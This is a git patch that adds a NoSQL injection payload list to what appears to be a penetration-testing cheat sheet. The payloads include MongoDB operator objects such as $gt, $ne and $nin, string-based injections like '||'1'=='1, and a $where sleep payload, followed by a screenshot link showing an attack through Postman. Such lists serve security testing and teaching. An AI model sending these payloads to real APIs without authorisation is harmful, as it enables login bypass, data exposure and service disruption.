From a5b4f9d94f14e79952dc992cd81b540b530f4a9a Mon Sep 17 00:00:00 2001
From: Mehdi <pentest.co@gmail.com>
Date: Sat, 27 Jul 2024 08:47:26 +0330
Subject: [PATCH] Update NoSQL Injection.md

---
 NoSQL Injection.md | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)

diff --git a/NoSQL Injection.md b/NoSQL Injection.md
index 30fac0a..5011943 100644
--- a/NoSQL Injection.md	
+++ b/NoSQL Injection.md	
@@ -1,5 +1,33 @@
 # NoSQL Injection
+
+
 ## Exploit
+* The following are common NoSQL metacharacters you could send in an API call to manipulate the database:
+```bash
+$gt
+{"$gt":""}
+{"$gt":-1}
+$ne
+{"$ne":""}
+{"$ne":-1}
+$nin
+{"$nin":1}
+{"$nin":[1]}
+|| '1'=='1
+//
+||'a'\\'a
+'||'1'=='1';//
+'/{}:
+'"\;{}
+'"\/$[].>
+{"$where": "sleep(1000)"}
+```
+
+* **Successful NoSQL injection attack using Postman:**
+![nosql](https://github.com/user-attachments/assets/3dd58830-ea8e-4444-b518-0889951a4779)
+
+
+
 **PHP**
 
 The exploits are based in adding an Operator